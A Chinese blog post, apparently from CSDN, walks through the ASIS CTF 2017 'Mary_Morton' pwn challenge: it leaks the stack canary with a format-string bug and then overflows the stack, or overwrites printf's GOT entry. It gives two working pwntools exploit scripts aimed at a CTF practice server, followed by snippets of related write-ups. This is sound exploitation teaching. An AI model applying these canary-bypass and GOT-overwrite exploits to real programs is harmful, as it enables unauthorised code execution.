从格式化字符串泄露canary到栈溢出

最新推荐文章于 2024-07-06 18:55:09 发布
最新推荐文章于 2024-07-06 18:55:09 发布
阅读量4.3k 收藏 5
点赞数 5
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38783875/article/details/86319184
版权

以ASIS-CTF-Finals-2017 Mary_Morton为例

checksec查看,开了NX保护,还有canary

IDA打开

void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
  const char *v3; // rdi
  int v4; // [rsp+24h] [rbp-Ch]
  unsigned __int64 v5; // [rsp+28h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  sub_4009FF();
  puts("Welcome to the battle ! ");
  puts("[Great Fairy] level pwned ");
  v3 = "Select your weapon ";
  puts("Select your weapon ");
  while ( 1 )
  {
    while ( 1 )
    {
      sub_4009DA(v3);
      v3 = "%d";
      __isoc99_scanf("%d", &v4);
      if ( v4 != 2 )
        break;
      sub_4008EB();
    }
    if ( v4 == 3 )
    {
      puts("Bye ");
      exit(0);
    }
    if ( v4 == 1 )
    {
      sub_400960();
    }
    else
    {
      v3 = "Wrong!";
      puts("Wrong!");
    }
  }
}

int sub_4009DA()
{
  puts("1. Stack Bufferoverflow Bug ");
  puts("2. Format String Bug ");
  return puts("3. Exit the battle ");
}

发现输入2 进入的函数中有格式化字符串洞

unsigned __int64 sub_4008EB()
{
  char buf; // [rsp+0h] [rbp-90h]
  unsigned __int64 v2; // [rsp+88h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  memset(&buf, 0, 0x80uLL);
  read(0, &buf, 0x7FuLL);
  printf(&buf, &buf);
  return __readfsqword(0x28u) ^ v2;
}

 

输入1 进入的函数中有栈溢出漏洞

unsigned __int64 sub_400960()
{
  char buf; // [rsp+0h] [rbp-90h]
  unsigned __int64 v2; // [rsp+88h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  memset(&buf, 0, 0x80uLL);
  read(0, &buf, 0x100uLL);
  printf("-> %s\n", &buf);
  return __readfsqword(0x28u) ^ v2;
}

还定义了一个函数,执行了 cat flag

这个题有两种做法

方法一:通过格式化字符串漏洞泄露canary,然后利用栈溢出漏洞执行cat flag函数

canary在入栈后,会清空eax中的数据

           

            而在一个函数执行完之后,canary的值会被再取出来,和现在的canary的值比较

            

        

  1.确定可控输入时格式化字符串的第6个参数

2.再确定canary和输入的参数参数之间的偏移

(1).由IDA中可看出,canary与buf之间距离0x88(136)个字节,因为是64位,以8 个字节为一个单位,136/8=17,那么canary距离格式化字符串函数23(17+6)个参数的距离

char buf; // [rsp+0h] [rbp-90h]

  unsigned __int64 v2; // [rsp+88h] [rbp-8h]

 (2)也可以用GDB来查看, 在printf函数处下断

    

然后运行,再输入了内容之后(这里输入了7个A),程序运行到断点处,查看栈中内容,计算canary和输入数据的偏移7FFFFFFFE058-7fffffffdfd0=0x88,以8 个字节为一个单位,136/8=17

    

编写exp

from pwn import *

r = remote('111.198.29.45','30473')
win = p64(0x4008de)
r.sendlineafter('3. Exit the battle \n', b'2')
r.sendline('%23$p')
pause(3)
canary = r.recv()
canary = int(re.search(b'0x[0-9a-f]{16}', canary).group(), 16)
log.info("canary ==> {0:x}".format(canary))

r.sendline(b'1')
payload = b"A" * 136
payload += p64(canary)
payload += b"W" * 8
payload += win * 4

r.sendline(payload)
print(r.recv())
print(r.recv())

方法二:通过格式化字符串洞覆盖函数地址,执行 catflag函数

确定可控输入时格式化字符串的第6个参数

使用python第三方库formatStringExploiter  更多详细信息:https://formatstringexploiter.readthedocs.io/en/latest/formatStringExploiter.html

先定义connect函数用来连接程序,定义exec_fmt实现payload的发送

 编写利用exp

from pwn import *
from time import sleep
from formatStringExploiter.FormatString import FormatString

elf = ELF('./mary_morton')
flag_addr = 0x04008DA
print_addr = elf.got['printf']

def connect():
    global sh
    sh = remote('111.198.29.45',30559)
    sh.recvuntil('battle \n')
def exec_fmt(s):
    sh.sendline('2')
    sleep(0.1)
    sh.sendline(s)
    ret = sh.recvuntil('1. Stack Bufferoverflow', drop=True)
    sh.recvuntil('battle \n')
    return ret

connect()
payload = FormatString(exec_fmt,elf=elf,index=6,pad=0,explore_stack=False)
payload.write_q(print_addr,flag_addr)
sh.sendline("1")
sh.sendline("1")
sh.interactive()

推荐阅读:https://veritas501.space/2017/04/28/%E8%AE%BAcanary%E7%9A%84%E5%87%A0%E7%A7%8D%E7%8E%A9%E6%B3%95/

SsMing.
关注
专栏目录
格式化字符串漏洞利用之泄露canary
weixin_44113469的博客
03-31 1523
两道格式化字符串漏洞利用入门题,绕过canary的一种姿势,不知道写的对不对,请大家多指正。 0x01 Canary 保护 开启了NX和canary。 题目分析 有个getshell函数,vuln函数里面明显的栈溢出格式化字符串漏洞,所以可以利用printf函数泄露出canary的值,然后利用栈溢出填充canary,控制返回指针执行getshell函数。 栈 从栈的情况看,var_8...
格式化字符串漏洞canary
qq_44813849的博客
07-26 467
用一道例题进行讲解 pwn1 先使用checksec命令看一下用来检查可执行文件属性 然后用ida打开 在主函数看到gets()函数,说明这是一个字符串漏洞,因为gets()函数可以输入无限长的字符串,所以会有溢出。 然后使用ubuntu打开,进行调试 gdb调试: 输入start开始 寻找断点地址 进入栈 一直按回车直到到栈底 附上脚本 from pwn import * shellcod...
pwn刷题num17-----格式化字符串泄露canary+栈溢出
tbsqigongzi的博客
04-23 1154
攻防世界pwn进阶区Mary_Morton 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启部分RELRO---got表仍可写 开启canary保护---栈溢出需绕过canary 开启NX保护----堆栈不可执行 未开启PIE----程序地址为真实地址 动态链接 运行后,选1是栈溢出,选2是格式化字符串溢出,选3是退出程序 ida一下主函数 简单的程序,三种选择,选1进入stack()函数 buf占0x90字节,read函数读入0x100字节,寻找
Canary,三种优雅姿势绕过
最新发布
yjh_fnu_ltn的博客
07-06 755
如果利用栈溢出将最低位的b’\x00’覆盖,就可以利用答应函数将canary一致输出,最后再在最低位拼接上。逐次覆盖掉canary的4个字节(一位无法绕过低位字节堆高位进行爆破,所以必须从低到高),且要求canary不能变化,绕过重开程序canary变化,就不适用爆破了。在进行栈溢出时,如果程序开启了canary保护,首先就需要泄漏这个随机值,否则其被覆盖掉后,程序在退出时再检查该值,会引发错误。注意:canary爆破时,利用栈溢出,溢出到canary位置,从。首先确定要覆盖的位置,由于是。
格式化字符串漏洞
Z_hehe的博客
12-11 1972
格式化字符串漏洞发生的条件就是格式字符串要去的参数和实际提供的参数不匹配。 漏洞利用: 对于格式化字符串漏洞的利用主要有:使程序崩溃、栈数据泄露、任意地址内存泄露、栈数据覆盖、任意地址内存覆盖。 1. 使程序崩溃:使用类似下面的程序代码会使得程序崩溃,原因有3点:1). 对于每一个%s,都要从栈中获取一个数字,将其视为一个地址,然后打印出地址指向的内存,直到出现一个空字符串;2) 获取的某个数字不是一个地址;3)获取的数字...
关于在栈上格式化字符串漏洞的利用方法
cainiao78777的博客
03-18 501
先说一下这个思路吧,就是通过两次格式化字符串漏洞,第一次泄露libc_base,以及栈里面的一个地址(任意)第二次修改printf的返回地址为one_gadget去getshell。
CTF-PWN-堆-【chunk extend/overlapping-2】(hack.lu ctf 2015 bookstore)
llovewuzhengzi的博客
02-07 1249
功能选择前就已经先创建三个大小为0x80的堆了(对于chunk的size为0x90),第一个chunk是order1的内容,第二个chunk是order2的内容,第三个chunk是dest的内容(这个存储字符串的),然后根据输入对应其功能函数,对应功能5的函数会创建一个0x140的堆(对于chunk的size为0x150),然后把之前函数定义的两个order的内容组合再加一个Your order is submitted!发现有个格式化字符串漏洞,但是在循环外,也就必须submit后才会执行该函数。
Canary机制及绕过策略-格式化字符串漏洞泄露Canary
01-27
例如,设置断点查看Canary,并通过格式化字符串漏洞来泄露Canary的值。在`printf`函数处下断点,利用格式化字符串的 `%n` 或其他方式来读取栈上的内存。通过计算偏移量,可以找出Canary相对于栈上其他已知地址的位置...
一个关于格式化字符串栈溢出的综合应用
weixin_45425107的博客
04-02 312
一个自己写的pwn题,因为C太菜所以挂上去后没法做= =,索性发出来让大家本地编译着玩玩 废话不多说,直接进入正题 #include<stdio.h> #include<stdlib.h> void sysbin(){ system("/bin/sh"); } int main(){ char buf[50]; char ap[20]; printf("Please input yor name:");
canary爆破、pie保护(格式化字符串漏洞)
2301_81031055的博客
01-29 406
canary两种解题方式:1.爆破canary2.如果存在字符串格式化漏洞可以输出泄露canary的地址并利用栈溢出覆盖canary的地址返回到system地址从而达到绕过。
[堆利用:TCache机制]HITB CTF 2018:gundam
Nashi_Ko的博客
03-19 1030
[堆利用:TCache机制]HITB CTF 2018:gundam 题目链接:https://github.com/moonAgirl/CTF/tree/master/2018/Hitbxctf/gundam 0x00 逆向分析 sub_AEA unsigned __int64 sub_AEA() { unsigned __int64 v1; // [rsp+8h] [rbp-8h] v1 = __readfsqword(0x28u); puts(&s); puts("1 . B
[冀信2021-pwn] pwn19
weixin_52640415的博客
12-15 2601
这是一个简单的printf+溢出题,可以输入2次6位的串用来printf,然后输入串溢出。 int __cdecl main(int argc, const char **argv, const char **envp) { int v5; // [rsp+Ch] [rbp-34h] __int64 buf[5]; // [rsp+10h] [rbp-30h] BYREF unsigned __int64 v7; // [rsp+38h] [rbp-8h] v7 = __readfsq
数据类型--ULL、ll
程序狗的成长之路
10-14 2万+
long long为64bit,
【Linux】imx6ull学习笔记
一只爱做笔记的码农
12-26 2364
笔记 板子: 正点原子imx6ull Linux驱动开发篇 字符设备驱动 字符设备驱动的编写就是编写驱动对应的open,close,read,其实就是file_operations结构体的实现 linux驱动程序可以编译到内核,也可以编译到模块里,测试的时候只需要加载模块 编译出来zImage和dtb,得对应上 一定要确定zImage,设备树,uboot的对应 将.ko放到根文件系统里,加载用insmod,modprobe,移除用rmmod 对于一个新的模块,第一次需要调用depmod 驱动模块加载成功
BUUCTF--xor
weixin_42558965的博客
05-15 1808
下载 解压之后,发现是一个文件夹加一个名为xor的文件,先用Exeinfo分析一下,不知道为什么得出的结果和网上的大佬不一样,不过这无关紧要。 可以知道是64bit,所以丢到IDA里面分析一下,进去之后,找到main函数并且F5反汇编得到的代码如下: int __cdecl main(int argc, const char **argv, const char **envp) { char *v3; // rsi int result; // eax signed int i; // [rs
0x100的十进制计算方法
其实并不难,是你太悲观
04-17 1万+
0x100 是一个 十六进制数,换算十进制的方法如下: 0x100=1*16*16+0*16+0*1=256      【记住一点,个位乘以1,十位、百位、千位....相应的要连续乘以2、3、4....个16】 0x1234=1*16*16*16+2*16*16+3*16+4*1=4096+512+48+4=4660 以此类推...... 八
0x100表示十进制是多少?
热门推荐
秦亚伟的专栏-金蝶 EAS BOS、苍穹平台技术
10-22 3万+
这是一个十六进制数,换算十进制的方法如下:0x100=1*16*16+0*16+0*1=2560x1234=1*16*16*16+2*16*16+3*16+4*1=4096+512+48+4=4660
go语言实现一个函数,该函数通过通道返回bool值
05-24
以下是一个简单的 Go 代码示例,实现一个返回 `bool` 值的函数 `returnBool`,该函数通过通道进行返回: ```go package main import "fmt" func returnBool(ch chan bool) { // 在此处进行一些计算或逻辑操作 result := true // 这里简单地返回 true ch <- result } func main() { ch := make(chan bool) go returnBool(ch) boolResult := <-ch fmt.Println(boolResult) } ``` 在上面的代码中,我们定义了一个名为 `returnBool` 的函数,该函数接受一个 `chan bool` 类型的通道作为参数,并在函数中进行一些计算或逻辑操作,最后将结果通过通道返回。 在 `main` 函数中,我们首先创建了一个 `chan bool` 类型的通道,并使用 `go` 关键字启动了一个并发的 `returnBool` 函数。接着,我们读取通道中的结果,并将其存储在名为 `boolResult` 的变量中。最后,我们输出了 `boolResult` 的值,即 `true`。 当然,这只是一个简单的示例,实际中的计算或逻辑操作可能会更加复杂。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值